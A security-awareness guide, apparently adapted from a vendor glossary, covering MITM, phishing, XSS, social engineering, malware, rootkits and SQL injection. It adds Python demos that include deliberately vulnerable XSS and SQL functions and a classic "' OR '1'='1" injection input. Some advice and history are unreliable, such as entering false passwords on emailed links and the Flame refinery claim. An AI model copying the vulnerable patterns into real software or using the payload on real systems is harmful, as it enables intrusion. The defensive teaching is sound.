After interception, any two-way SSL traffic needs to be decrypted without alerting the
user or application. A number of methods exist to achieve this:
HTTPS spoofing presents a forged certificate to the victim's browser once the initial
connection request to a secure site is made. The attack succeeds only if the browser
accepts the certificate, either because the user clicks through the warning or because a
certificate authority controlled by the attacker has been installed on the machine; a browser
that validates the chain against its trusted roots and checks the host name will refuse. If
it is accepted, the attacker can read any data entered by the victim before passing it on to
the application.
SSL BEAST (browser exploit against SSL/TLS) targets a weakness in TLS 1.0's use of
cipher block chaining (CBC). The victim's browser is made to run malicious JavaScript
that issues chosen requests to a web application while the attacker observes the encrypted
traffic; the predictable initialization vectors in TLS 1.0 CBC mode then let the attacker
decrypt the cookies and authentication tokens block by block. TLS 1.1 and later are not
affected.
SSL hijacking occurs when an attacker supplies forged keys to both the user and the
application during the TLS handshake. This sets up what appears to be a secure
connection when, in fact, the man in the middle terminates both halves and controls the
entire session.
SSL stripping downgrades an HTTPS connection to HTTP by intercepting the redirect from
the plain-HTTP site to its HTTPS version. The attacker serves an unencrypted version of
the application's site to the user while maintaining the secured session with the
application. Meanwhile, the user's entire session is visible to the attacker. HTTP Strict
Transport Security (HSTS), which tells the browser to use only HTTPS for that host,
prevents the downgrade on later visits.
MAN IN THE MIDDLE ATTACK PREVENTION
Blocking MITM attacks requires several practical steps on the part of users, as well as a
combination of encryption and verification methods for applications.
For users, this means:
Avoiding WiFi connections that aren’t password protected.
Paying attention to browser notifications reporting a website as being unsecured.
Immediately logging out of a secure application when it’s not in use.
Not using public networks (e.g., coffee shops, hotels) when conducting sensitive
transactions.
PHISHING ATTACKS-
Phishing is a type of social engineering attack often used to steal user data, including
login credentials and credit card numbers. It occurs when an attacker, masquerading as a
trusted entity, dupes a victim into opening an email, instant message, or text message.
The recipient is then tricked into clicking a malicious link, which can lead to the
installation of malware, the freezing of the system as part of a ransomware attack or the
revealing of sensitive information.
An attack can have devastating results. For individuals, this includes unauthorized
purchases, the stealing of funds, or identity theft.
Moreover, phishing is often used to gain a foothold in corporate or governmental
networks as part of a larger attack, such as an advanced persistent threat (APT) event.
In this latter scenario, employees are compromised in order to bypass security perimeters,
distribute malware inside a closed environment, or gain privileged access to secured data.
An organization succumbing to such an attack typically sustains severe financial losses in
addition to declining market share, reputation, and consumer trust. Depending on scope, a
phishing attempt might escalate into a security incident from which a business will have a
difficult time recovering.
PHISHING ATTACK EXAMPLES
The following illustrates a common phishing scam attempt:
A spoofed email ostensibly from myuniversity.edu is mass-distributed to as many faculty
members as possible.
The email claims that the user’s password is about to expire. Instructions are given to go
to myuniversity.edu/renewal to renew their password within 24 hours.
Several things can occur by clicking the link. For example:
The user is redirected to myuniversity.edurenewal.com, a bogus page appearing exactly
like the real renewal page, where both new and existing passwords are requested. The
attacker, monitoring the page, hijacks the original password to gain access to secured
areas on the university network.
The user is sent to the actual password renewal page. However, while being redirected, a
malicious script activates in the background to hijack the user's session cookie. This is a
reflected XSS attack on the real site, and it gives the perpetrator the user's privileged
access to the university network without ever seeing the password.
PHISHING TECHNIQUES
EMAIL PHISHING SCAMS
Email phishing is a numbers game. An attacker sending out thousands of fraudulent
messages can net significant information and sums of money, even if only a small
percentage of recipients fall for the scam. As seen above, there are some techniques
attackers use to increase their success rates.
For one, they will go to great lengths in designing phishing messages to mimic actual
emails from a spoofed organization. Using the same phrasing, typefaces, logos, and
signatures makes the messages appear legitimate.
In addition, attackers will usually try to push users into action by creating a sense of
urgency. For example, as previously shown, an email could threaten account expiration
and place the recipient on a timer. Applying such pressure causes the user to be less
diligent and more prone to error.
Lastly, links inside messages resemble their legitimate counterparts, but typically have a
misspelled domain name or extra subdomains. In the above example,
the myuniversity.edu/renewal URL was changed to myuniversity.edurenewal.com.
Similarities between the two addresses offer the impression of a secure link, making the
recipient less aware that an attack is taking place.
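The link check that catches the "myuniversity.edurenewal.com" trick, as an added example that is not part of the original page. A link is judged by the host the browser will actually connect to (the URL's hostname), matched against the expected domain on a label boundary, so a domain with an extra tail, an extra subdomain before the attacker's domain, or the expected name hidden in the user-info part of the URL is all reported. The domains and links are constructed for the demo.

```python
from urllib.parse import urlparse


def registrable_match(hostname, expected_domain):
    """True only if hostname is expected_domain or a subdomain of it, matched
    on a dot boundary: 'myuniversity.edurenewal.com' and
    'myuniversity.edu.attacker.com' both fail."""
    hostname = hostname.lower().rstrip(".")
    expected = expected_domain.lower()
    return hostname == expected or hostname.endswith("." + expected)


def check_link(url, expected_domain):
    """Classify a link the way the hover check should: by the host the browser
    will connect to, not by whatever appears earlier in the string."""
    p = urlparse(url)
    host = p.hostname or ""
    if p.scheme not in ("http", "https"):
        return f"suspicious: non-web scheme {p.scheme!r}"
    if not registrable_match(host, expected_domain):
        if expected_domain.lower() in url.lower():
            return f"suspicious: looks like {expected_domain} but connects to {host}"
        return f"suspicious: connects to {host}"
    if p.scheme != "https":
        return "warning: legitimate host over plain HTTP"
    return "ok"


# Constructed links, including the one from the text and two further variants.
LINKS = {
    "https://myuniversity.edu/renewal":              "ok",
    "https://portal.myuniversity.edu/renewal":       "ok",
    "http://myuniversity.edurenewal.com/renewal":    "suspicious: looks like myuniversity.edu but connects to myuniversity.edurenewal.com",
    "https://myuniversity.edu.attacker.com/renewal": "suspicious: looks like myuniversity.edu but connects to myuniversity.edu.attacker.com",
    "https://myuniversity.edu@attacker.com/renewal": "suspicious: looks like myuniversity.edu but connects to attacker.com",
    "http://myuniversity.edu/renewal":               "warning: legitimate host over plain HTTP",
}


def check_all(links, expected_domain="myuniversity.edu"):
    """Map each link to its classification."""
    return {url: check_link(url, expected_domain) for url in links}
```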
SPEAR PHISHING
Spear phishing targets a specific person or enterprise, as opposed to random application
users. It’s a more in depth version of phishing that requires special knowledge about an
organization, including its power structure.
An attack might play out as follows:
A perpetrator researches names of employees within an organization’s marketing
department and gains access to the latest project invoices.
Posing as the marketing director, the attacker emails a departmental project manager
(PM) using a subject line that reads, Updated invoice for Q3 campaigns. The text, style,
and included logo duplicate the organization’s standard email template.
A link in the email redirects to a password-protected internal document, which is in
actuality a spoofed version of a stolen invoice.
The PM is requested to log in to view the document. The attacker steals his credentials,
gaining full access to sensitive areas within the organization’s network.
By providing an attacker with valid login credentials, spear phishing is an effective
method for executing the first stage of an APT.
PHISHING PROTECTION
Phishing attack protection requires steps be taken by both users and enterprises.
For users, vigilance is key. A spoofed message often contains subtle mistakes that expose
its true identity. These can include spelling mistakes or changes to domain names, as seen
in the earlier URL example. Users should also stop and think about why they’re even
receiving such an email.
For enterprises, a number of steps can be taken to mitigate both phishing and spear
phishing attacks:
Two-factor authentication (2FA) is one of the most effective methods for countering
phishing attacks, as it adds an extra verification layer when logging in to sensitive
applications. 2FA relies on users having two things: something they know, such as a
password and user name, and something they have, such as their smartphones. Even when
employees are tricked into revealing their password, 2FA prevents the use of that password
alone. Be aware that one-time codes sent by SMS or generated by an app can themselves be
phished in real time by a proxy site that relays them; phishing-resistant methods such as
FIDO2/WebAuthn security keys, which bind the login to the genuine origin, are not fooled
this way.
In addition to using 2FA, organizations should enforce sound password management
policies: employees should not be allowed to reuse a password across multiple
applications, and passwords known to be compromised should be reset promptly. Forcing
frequent routine password changes is no longer recommended, since it pushes users
toward predictable patterns.
Educational campaigns can also help diminish the threat of phishing attacks by
encouraging secure practices, such as not clicking on links in unexpected external emails
and reporting suspicious messages.
REFLECTED CROSS SITE SCRIPTING (XSS) ATTACKS
Cross-site scripting (XSS) is a web application vulnerability that permits an attacker to
inject code (typically HTML or JavaScript) into the contents of a website he does not
control. When a victim views an infected page on the website, the injected code executes
in the victim's browser with that website's origin. Consequently, the attacker has bypassed
the browser's same-origin policy and is able to steal private information the victim holds
for that website.
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is
reflected off of a web application to the victim’s browser.
The script is activated through a link, which sends a request to a website with a
vulnerability that enables execution of malicious scripts. The vulnerability is typically a
result of incoming requests not being sufficiently sanitized, which allows for the
manipulation of a web application’s functions and the activation of malicious scripts.
To distribute the malicious link, a perpetrator typically embeds it into an email or third-
party website (e.g., in a comment section or in social media). The link is embedded inside
anchor text that provokes the user into clicking on it, which initiates the XSS request
to an exploited website, reflecting the attack back to the user.
Unlike a stored attack, where the perpetrator must locate a website that allows for
permanent injection of malicious scripts, reflected attacks only require that the malicious
script be embedded into a link. That being said, in order for the attack to be successful,
the user needs to click on the infected link.
As such, there are a number of key differences between reflected and stored XSS attacks,
including:
Reflected attacks are more common.
Reflected attacks do not have the same reach as stored XSS attacks.
Reflected attacks can be avoided by vigilant users.
With a reflected XSS, the perpetrator plays a “numbers game” by sending the malicious
link to as many users as possible, thereby improving his odds of successfully executing
the attack.
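As an added illustration (not code from the original guide), the following Python shows the defect described above, a search page that echoes the q parameter straight back into its HTML, beside the hardened version that applies output encoding at the point of insertion, plus the reflection check a tester runs with a harmless probe string. The page template and the probe string are constructed for the example.

```python
import html
from urllib.parse import parse_qs, quote

# Constructed page template: the "q" parameter lands in an element body and
# in an attribute value, the two contexts a reflected XSS most often abuses.
TEMPLATE = '<h1>Results for: {body}</h1>\n<input name="q" value="{attr}">'

# Harmless probe string (constructed): it is not executable, but if it comes
# back verbatim it proves the page reflects input without encoding it.
PROBE = '"><probe-marker>'
PROBE_QS = "q=" + quote(PROBE)  # the URL-encoded query string a link would carry


def query_param(query_string: str, name: str = "q") -> str:
    """Pull one parameter out of a raw query string, URL-decoded."""
    return parse_qs(query_string).get(name, [""])[0]


def render_vulnerable(query_string: str) -> str:
    """The flaw the text describes: the request value is inserted as-is."""
    q = query_param(query_string)
    return TEMPLATE.format(body=q, attr=q)


def render_hardened(query_string: str) -> str:
    """Output encoding at the point of insertion: <, >, &, " and ' are all
    escaped, so the browser treats the value as text in the body and in the
    attribute rather than as markup."""
    q = query_param(query_string)
    safe = html.escape(q, quote=True)
    return TEMPLATE.format(body=safe, attr=safe)


def reflects_unescaped(page: str, untrusted: str) -> bool:
    """Reflection check: True when input containing HTML metacharacters comes
    back verbatim, i.e. the response is a candidate for reflected XSS."""
    has_metachars = html.escape(untrusted, quote=True) != untrusted
    return has_metachars and untrusted in page


if __name__ == "__main__":
    print("vulnerable reflects probe:", reflects_unescaped(render_vulnerable(PROBE_QS), PROBE))
    print("hardened reflects probe:  ", reflects_unescaped(render_hardened(PROBE_QS), PROBE))
    print(render_hardened(PROBE_QS))
```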
SOCIAL ENGINEERING- Social engineering is the term used for a broad range of malicious
activities accomplished through human interactions. It uses psychological manipulation to trick
users into making security mistakes or giving away sensitive information.
Social engineering attacks happen in one or more steps. A perpetrator first investigates
the intended victim to gather necessary background information, such as potential points
of entry and weak security protocols, needed to proceed with the attack. Then, the
attacker moves to gain the victim’s trust and provide stimuli for subsequent actions that
break security practices, such as revealing sensitive information or granting access to
critical resources.
[Figure: Social engineering attack lifecycle]
What makes social engineering especially dangerous is that it relies on human error,
rather than vulnerabilities in software and operating systems. Mistakes made by
legitimate users are much less predictable, making them harder to identify and thwart
than a malware-based intrusion.
SOCIAL ENGINEERING ATTACK TECHNIQUES
Social engineering attacks come in many different forms and can be performed anywhere
where human interaction is involved. The following are the five most common forms of
digital social engineering assaults.
Baiting
As its name implies, baiting attacks use a false promise to pique a victim’s greed or
curiosity. They lure users into a trap that steals their personal information or infects
their systems with malware.
The most reviled form of baiting uses physical media to disperse malware. For example,
attackers leave the bait—typically malware-infected flash drives—in conspicuous areas
where potential victims are certain to see them (e.g., bathrooms, elevators, the parking lot
of a targeted company). The bait has an authentic look to it, such as a label presenting it
as the company’s payroll list.
Victims pick up the bait out of curiosity and insert it into a work or home computer,
resulting in automatic malware installation on the system.
Baiting scams don’t necessarily have to be carried out in the physical world. Online
forms of baiting consist of enticing ads that lead to malicious sites or that encourage users
to download a malware-infected application.
Scareware
Scareware involves victims being bombarded with false alarms and fictitious threats.
Users are deceived to think their system is infected with malware, prompting them to
install software that has no real benefit (other than for the perpetrator) or is malware
itself. Scareware is also referred to as deception software, rogue scanner software and
fraudware.
A common scareware example is the legitimate-looking popup banners appearing in your
browser while surfing the web, displaying text such as, “Your computer may be
infected with harmful spyware programs.” It either offers to install the tool (often
malware-infected) for you, or will direct you to a malicious site where your computer
becomes infected.
Scareware is also distributed via spam email that doles out bogus warnings, or makes
offers for users to buy worthless/harmful services.
Pretexting
Here an attacker obtains information through a series of cleverly crafted lies. The scam is
often initiated by a perpetrator pretending to need sensitive information from a victim so
as to perform a critical task.
The attacker usually starts by establishing trust with their victim by impersonating co-
workers, police, bank and tax officials, or other persons who have right-to-know
authority. The pretexter asks questions that are ostensibly required to confirm the
victim’s identity, through which they gather important personal data.
All sorts of pertinent information and records are gathered using this scam, such as social
security numbers, personal addresses and phone numbers, phone records, staff vacation
dates, bank records and even security information related to a physical plant.
Phishing
As one of the most popular social engineering attack types, phishing scams are email and
text message campaigns aimed at creating a sense of urgency, curiosity or fear in victims.
It then prods them into revealing sensitive information, clicking on links to malicious
websites, or opening attachments that contain malware.
An example is an email sent to users of an online service that alerts them of a policy
violation requiring immediate action on their part, such as a required password change. It
includes a link to an illegitimate website—nearly identical in appearance to its legitimate
version—prompting the unsuspecting user to enter their current credentials and new
password. Upon form submittal the information is sent to the attacker.
Given that identical, or near-identical, messages are sent to all users in phishing
campaigns, detecting and blocking them is much easier for mail servers that have access
to threat sharing platforms.
Spear phishing
This is a more targeted version of the phishing scam whereby an attacker chooses specific
individuals or enterprises. They then tailor their messages based on characteristics, job
positions, and contacts belonging to their victims to make their attack less
conspicuous. Spear phishing requires much more effort on behalf of the perpetrator and
may take weeks or months to pull off. Such attacks are much harder to detect and have
better success rates if done skillfully.
A spear phishing scenario might involve an attacker who, in impersonating an
organization’s IT consultant, sends an email to one or more employees. It’s worded and
signed exactly as the consultant normally does, thereby deceiving recipients into thinking
it’s an authentic message. The message prompts recipients to change their password and
provides them with a link that redirects them to a malicious page where the attacker now
captures their credentials.
SOCIAL ENGINEERING PREVENTION
Social engineers manipulate human feelings, such as curiosity or fear, to carry out
schemes and draw victims into their traps. Therefore, be wary whenever you feel alarmed
by an email, attracted to an offer displayed on a website, or when you come across stray
digital media lying about. Being alert can help you protect yourself against most social
engineering attacks taking place in the digital realm.
Moreover, the following tips can help improve your vigilance in relation to social
engineering hacks.
Don’t open emails and attachments from suspicious sources – If you don’t know the
sender in question, you don’t need to answer an email. Even if you do know them and are
suspicious about their message, cross-check and confirm the news from other sources,
such as via telephone or directly from a service provider’s site. Remember that email
addresses are spoofed all of the time; even an email purportedly coming from a trusted
source may have actually been initiated by an attacker.
Use multifactor authentication – One of the most valuable pieces of information attackers
seek are user credentials. Using multifactor authentication helps ensure your account’s
protection in the event of system compromise. Imperva Login Protect is an easy-to-
deploy 2FA solution that can increase account security for your applications.
Be wary of tempting offers – If an offer sounds too enticing, think twice before accepting
it as fact. Googling the topic can help you quickly determine whether you’re dealing with
a legitimate offer or a trap.
Keep your antivirus/antimalware software updated – Make sure automatic updates are
engaged, or make it a habit to download the latest signatures first thing each day.
Periodically check to make sure that the updates have been applied, and scan your system
for possible infections.
MALWARE TYPES- WHAT IS MALWARE
Malware refers to malicious software perpetrators dispatch to infect individual computers
or an entire organization’s network. It exploits target system vulnerabilities, such as a bug
in legitimate software (e.g., a browser or web application plugin) that can be hijacked.
A malware infiltration can be disastrous—consequences include data theft, extortion or
the crippling of network systems.
COMMON MALWARE TYPES
There are numerous malware types, each having their own application area and focus.
Seven of the most common variations are as follows:
Ransomware – Once installed, this malware encrypts files on a computer and/or across an
extended network. A popup display informs the user that unless a ransom is paid, their
files will remain encrypted.
Perpetrators use worms to create botnets from large numbers of compromised
connected devices (e.g., mobile phones or PCs). Such devices are known as “zombies”
because their owners are oblivious to the infection and that their systems are used as part
of a much larger attack, such as a distributed denial of service (DDoS).
Worm examples include:
NgrBot – This worm propagates through chat messengers and social networking sites.
Perpetrators use social engineering to encourage downloading of the malware that, once
installed, turns the user’s machine into a zombie participating in a massive botnet. It also
stops infected systems from being updated and can steal login credentials and other
sensitive information.
ILOVEYOU – This has been deployed using a social engineering attack that encouraged
people, through the enticement of a possible love interest, to open an email attachment
containing the worm. A Visual Basic script is run that then overwrites various file types.
The worm has infected an estimated 45 million computers.
Trojan – A Trojan appears legitimate but carries a dangerous payload. While it doesn’t
replicate itself as do worms, it typically comes packaged with additional malware types—
including backdoors, rootkits, ransomware and spyware.
The banking industry is a favorite target of Trojan attacks. For instance, the Tiny Banker
Trojan (Tinba) malware is executed via the Rig exploit kit. Installation is achieved
by first locating a software vulnerability on the target computer. It then overlays a
spoofed screen requesting personal information, including credit card details, whenever
the system user visits a bank site (see below).
[Figure: Tiny Banker Trojan being used to dupe Wells Fargo users into disclosing sensitive
information]
Rootkits – These are prepared, customizable software packages. They grant access to
sensitive parts of an application, enable the execution of files and can even change
system configurations.
Typically deployed through a social engineering attack (e.g., phishing)—resulting in the
theft of a user’s login credentials—its installation gains access to a network. The rootkit
can then subvert any anti-malware software that might otherwise be able to detect it,
giving the perpetrator free rein to install additional malware.
Examples of rootkits include Flame, used in cyberespionage attacks to steal screenshots,
record keystrokes and monitor network traffic. It was most notably used to disrupt Iranian
oil refinery production in 2012.
Backdoors – A backdoor negates normal authentication required to access a system, such
as via a webserver or database. Often its installation is part of a targeted assault; after
researching a victim, social engineering is used to steal login credentials and gain access
to an application.
Backdoors avoid detection and are used to set up a control center. This lets the
perpetrator remotely update malware and initiate system commands.
Backdoors are used for many malicious activities, including data theft, denial of service
assaults and infection of your visitors’ computers. It’s also an initial step when executing
an advanced persistent threat (APT) assault.
Backdoors have recently been found in a number of Internet of Things (IoT) devices,
such as security Wi-Fi cameras used by organizations. Once an IoT device has been
hacked and turned into a backdoor, it effectively provides a gateway into that network.
Adware – One of the earliest malware types, adware originated in the days of freeware.
The software was free, but included popup ads that appeared whenever you used it. While
annoying, it wasn’t malicious.
Today your system can be infected from visiting a compromised website where its
malware-laden adware, using a browser vulnerability, installs itself.
Spyware – This malware variant gathers personal data and sends it to a third-party
without your knowledge or consent.
A highly malicious spyware type is a keylogger. Once installed, it tracks keyboard entries
and sends the data, including login credentials, to the perpetrator.
MALWARE DETECTION AND REMOVAL
Imperva has a number of services that prevent malware installation while weeding out
existing infections on web application servers.
Web Application Firewall (WAF) – Deployed at the edge of your network, Imperva’s PCI
DSS-compliant cloud service uses signature, behavioral and reputational analysis to block
all malware injection attacks on your websites and web applications. Imperva cloud WAF
is offered as a managed service and maintained by a dedicated security team.
Backdoor Protect – A service that intercepts communication attempts with backdoor
shells on your web server. By tracing these requests, the service is able to pinpoint the
most highly obfuscated malware, even if it was installed on your web server long before
you onboarded Imperva cloud security services.
Login Protect – A flexible two-factor authentication (2FA) solution that requires zero
integration and can be instantly deployed on any Imperva cloud-protected URL address.
The service prevents perpetrators from using stolen login credentials to obtain network
access and install rootkits and backdoors on your web servers.
ROOTKIT-
A rootkit is a software program, typically malicious, that provides privileged, root-
level (i.e., administrative) access to a computer while concealing its presence on that
machine. Simply put, it is a nasty type of malware that can severely impact your PC’s
performance and also put your personal data at risk.
Once installed, a rootkit typically boots at the same time as the computer’s operating
system, or after the boot process begins. There are, however, rootkits that can boot up
before the target operating system, making them very difficult to detect.
Potential consequences of a rootkit include:
Concealed malware – Rootkits allow attackers to install additional malware on infected
computers. They hide malicious programs from users and any anti-virus software
installed on a computer.
Information theft – Malicious software installed with the aid of rootkits can be used to
steal user passwords, credit card information, or other sensitive data without being
detected.
File deletion – Rootkits can delete operating system code or other files on a system.
Eavesdropping – Hackers can use rootkits to eavesdrop on users and intercept their
personal information.
File execution – After subverting anti-malware software on a system, rootkits allow
perpetrators to remotely execute other files on target computers.
Remote access – Rootkits can alter system configuration settings, such as opening up
backdoor TCP ports in firewall settings, or altering startup scripts. This grants attackers
remote access, allowing them, for example, to use the computer in a botnet.
ROOTKIT INJECTION
There are a number of ways that a rootkit can stealthily be installed on your system.
These include:
PIGGYBACKING
Users can unknowingly install rootkits that have been bundled with apparently
trustworthy software. When the administrator gives permission to install the software, the
rootkit also silently installs on the computer.
In 2005, Sony secretly bundled a rootkit with its Extended Copy Protection software,
which came with millions of Sony CDs. The rootkit modified host operating systems and
tried to prevent users from making copies of CDs. However, hackers were able to exploit
vulnerabilities in Sony’s rootkit to gain malicious access to the affected systems.
BLENDED THREAT
A rootkit cannot infect target computers on its own. In order to spread a rootkit, attackers
form a blended threat to exploit several different vulnerabilities and infiltrate a system.
This is achieved by combining the rootkit with two other components—a dropper, and a
loader.
Dropper – A dropper is a program or a file used to install a rootkit on a target computer.
Droppers can be distributed in a number of ways, including through social engineering or
a brute force attack, in which a perpetrator uses a program to repeatedly guess a system’s
root username and password.
Loader – A loader is malicious code that launches after a user initiates the dropper
program, either by opening or executing a file. The loader exploits vulnerabilities to
ensure the rootkit loads together with the target system. For example, a kernel-level
rootkit might use a loader that exploits a Linux vulnerability to replace operating system
code with a rewritten Loadable Kernel Module.
[Figure: Example of a two-stage kernel rootkit injection]
ROOTKIT TYPES
There are a number of types of rootkits that can be installed on a target system. Some
examples include:
User-mode or application rootkit – These are installed in a shared library and operate at
the application layer, where they can modify application and API behavior. User-mode
rootkits are relatively easy to detect because they operate at the same layer as anti-virus
programs.
Kernel-mode – These rootkits are implemented within an operating system’s kernel
module, where they can control all system processes. In addition to being difficult to
detect, kernel-mode rootkits can also impact the stability of the target system.
Bootkits – These rootkits gain control of a target system by infecting its master boot
record (MBR). Bootkits allow a malicious program to execute before the target operating
system loads.
Firmware rootkits – These rootkits gain access to the software that runs devices, such as
routers, network cards, hard drives or system BIOS.
Rootkit hypervisors – These rootkits exploit hardware virtualization features to gain
control of a machine. This is done by bypassing the kernel and running the target
operating system in a virtual machine. Hypervisors are almost impossible to detect and
clean because they operate at a higher level than the operating system, and can intercept
all hardware calls made by the target operating system.
ANTI-ROOTKIT MEASURES
Protecting your systems from rootkits is a two-pronged process involving scanning for
existing malware and preventing the installation of new programs.
ROOTKIT SCANNERS
Scanners are programs designed to parse a system in order to weed out active rootkits.
While scanners can help detect and remove application-layer rootkits, they’re typically
ineffective against those operating at the kernel, boot or firmware level. Scanners that can
search for malicious code at the kernel level can only run when the rootkit is inactive.
This means that a system has to be booted in safe mode with system processes stopped in
order to be effective.
It’s because of these limitations that security experts recommend using several scanners
and rootkit removers, as no individual tool can guarantee that a system is completely
clean.
To fully secure your system from rootkits operating at the boot, firmware or hypervisor
level, the only remedy is to back up data, then wipe the device and perform a clean install.
PREEMPTIVE BLOCKING
Rootkit prevention is based on the idea that a rootkit can be delivered onto your system
via both individual users and web-facing assets (i.e., websites).
The first preventative measure is user education for everyone in your organization. This
should involve instructions on how to detect malicious links and email attachments, as
well as rules against downloading or opening files from unknown sources.
Users should also be trained to identify and avoid phishing attempts, in which malicious
messages, websites or files surreptitiously appear to come from legitimate sources. This
is especially important for users with administrative privileges.
Additional measures preventing rootkits include:
Keeping software updated and patching known vulnerabilities in applications and
operating systems.
Running anti-virus and occasionally running anti-rootkit tools on sensitive machines.
Behavioral-based detection, which analyzes system behavior to discover suspicious
patterns of API calls or CPU usage, which may indicate a rootkit.
Close examination of network logs from packet analyzers, firewalls, or other network
tools to identify rootkits communicating with a remote control center.
IMPERVA ROOTKIT DETECTION AND REMOVAL
Imperva provides a number of solutions to block rootkit installation, as well as to detect
existing rootkits that might have been installed prior to onboarding our services.
WEB APPLICATION FIREWALL (WAF)
Imperva WAF acts as a gateway for incoming traffic to web applications and websites,
using behavioral analysis to block rootkit injection attempts.
BACKDOOR PROTECT
Imperva Backdoor Protect is a shell detection service that closely tracks incoming
requests, helping to pinpoint and quarantine backdoor files so they can be safely
removed.
LOGIN PROTECT
Login Protect is a two-factor authentication service. It prevents perpetrators from using
stolen login credentials to obtain server access and install rootkits. With Login Protect,
passwords alone no longer suffice for gaining administrative access to a system.
SPEAR PHISHING-
Spear phishing is a social engineering attack in which a perpetrator, disguised as a
trusted individual, tricks a target into clicking a link in a spoofed email, text message or
instant message. As a result, the target unwittingly reveals sensitive information, installs
malicious programs (malware) on their network or executes the first stage of
an advanced persistent threat (APT), to name a few of the possible consequences.
While similar to phishing and whaling attacks, spear phishing is launched in a unique
way and its targets differ from other social engineering assaults. As a result, the attack
deserves special attention when formulating your application security strategy.
SPEAR PHISHING EXAMPLE
The following example illustrates a spear phishing attack’s progression and potential
consequences:
A spoofed email is sent to an enterprise’s sysadmin from someone claiming to
represent www.itservices.com, a database management SaaS provider. The email uses
the itservices.com customer mailing template.
The email claims that itservices.com is offering a free new service for a limited time and
invites the user to sign up for the service using the enclosed link.
After clicking on the link, the sysadmin is redirected to a login page on itservice.com, a
fake website identical to the itservices.com registration page.
At the same time, a command and control agent is installed on the sysadmin’s machine,
which can then be used as a backdoor into the enterprise’s network to execute the first
stage of an APT.
SPEAR PHISHING VS. PHISHING AND WHALING ATTACKS
Spear phishing, phishing and whaling attacks vary in their levels of sophistication and
intended targets. Their differences are highlighted below.
PHISHING
Phishing involves sending malicious emails from supposed trusted sources to as many
people as possible, assuming a low response rate. For example, a phishing email might
purport to be from PayPal and ask a recipient to verify their account details by clicking
on an enclosed link, which leads to the installation of malware on the victim’s computer.
Phishing emails are impersonal, sent in bulk and often contain spelling errors or other
mistakes that reveal their malicious intent. The problem is that not everyone notices these
subtle hints. Trusted logos and links to known destinations are enough to trick many
people into sharing their details.
Spear phishing emails, on the other hand, are more challenging to detect because they
appear to come from sources close to the target. Cyber-criminals send personalized
emails to particular individuals or groups of people with something in common, such as
employees working in the same department.
WHALING
Whaling uses deceptive email messages targeting high-level decision makers within an
organization, such as CEOs, CFOs, and other executives. Such individuals have access to
highly valuable information, including trade secrets and passwords to administrative
company accounts.
The attacker sends emails on issues of critical business importance, masquerading as an
individual or organization with legitimate authority. For example, an attacker may send
an email to a CEO requesting payment, pretending to be a client of the company.
Whaling attacks always personally address targeted individuals, often using their title,
position and phone number, which are obtained using company websites, social media or
the press.
The difference between whaling and spear phishing is that whaling exclusively targets
high-ranking individuals within an organization, while spear phishing usually goes after a
category of individuals with a lower profile.
SPEAR PHISHING MITIGATION
The targeted nature of spear phishing attacks makes them difficult to detect. However,
several risk prevention measures can help, including two-factor authentication (2FA),
password management policies and educational campaigns.
TWO FACTOR AUTHENTICATION
2FA helps secure login to sensitive applications by requiring users to have two things:
something they know, such as a password and user name, and something they have, such
as a smartphone or cryptographic token. When 2FA is used, even if a password is
compromised using a technique like spear phishing, it’s of no use to an attacker without
the physical device held by the real user.
PASSWORD MANAGEMENT POLICIES
A prudent password management policy should take steps to prevent employees from
using corporate access passwords on fake external websites.
One example of such a policy is to instruct employees to always enter a false password
when accessing a link provided by email. A legitimate website won’t accept a false
password, but a phishing site will.
EDUCATIONAL CAMPAIGNS
At the organizational level, enterprises can raise awareness and actively train employees,
highlighting spear phishing attacks as an important threat. Training materials can feature
real-life examples of spear phishing, with questions designed to test employee
knowledge. Employees who are aware of spear phishing are less likely to fall victim to an
attack.
SQL (STRUCTURED QUERY LANGUAGE) INJECTION- SQL injection, also known
as SQLI, is a common attack vector that uses malicious SQL code for backend database
manipulation to access information that was not intended to be displayed. This information
may include any number of items, including sensitive company data, user lists or private
customer details.
The impact SQL injection can have on a business is far reaching. A successful attack may
result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain
cases, the attacker gaining administrative rights to a database, all of which are highly
detrimental to a business.
When calculating the potential cost of a SQLI, it’s important to consider the loss of
customer trust should personal information such as phone numbers, addresses and credit
card details be stolen.
While this vector can be used to attack any SQL database, websites are the most frequent
targets.
SQLI PREVENTION AND MITIGATION
There are several effective ways to prevent SQLI attacks from taking place, as well as
protecting against them, should they occur.
The first step is input validation (a.k.a. sanitization), which is the practice of writing code
that can identify illegitimate user inputs.
While input validation should always be considered best practice, it is rarely a foolproof
solution. The reality is that, in most cases, it is simply not feasible to map out all legal
and illegal inputs—at least not without causing a large amount of false positives, which
interfere with user experience and an application’s functionality.
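To make the two layers concrete, here is an added Python example (not code from the original guide) against an in-memory SQLite table constructed for the demonstration: a lookup built by string concatenation beside the parameterized form, and an allow-list validator for one field that shows why validation is a second layer rather than the fix itself.

```python
import re
import sqlite3

# Constructed stand-in for a customer table; the rows are sample data.
SAMPLE_ROWS = [
    (1, "alice", "alice@example.com"),
    (2, "bob", "bob@example.com"),
    (3, "carol", "carol@example.com"),
]

# The textbook tautology input: it changes the WHERE clause from a comparison
# into a condition that is true for every row.
TAUTOLOGY = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    """Build the in-memory table the two lookups below query."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """String concatenation: the user value becomes part of the SQL grammar,
    so a quote in the input rewrites the query rather than being compared."""
    sql = "SELECT name, email FROM customers WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> list:
    """Bound parameter: the driver passes the value separately from the query
    text, so it is only ever compared as a string, never parsed as SQL."""
    return conn.execute(
        "SELECT name, email FROM customers WHERE name = ?", (name,)
    ).fetchall()


# Allow-list for this one field. As the text notes, such a map of legal input
# is field-specific and rarely possible for free-text fields, which is why it
# complements parameterization instead of replacing it.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{0,31}")


def validate_username(name: str) -> bool:
    """True only when the whole value matches the allow-list pattern."""
    return USERNAME_RE.fullmatch(name) is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tautology:   ", lookup_vulnerable(db, TAUTOLOGY))
    print("parameterized, tautology:", lookup_parameterized(db, TAUTOLOGY))
    print("parameterized, alice:    ", lookup_parameterized(db, "alice"))
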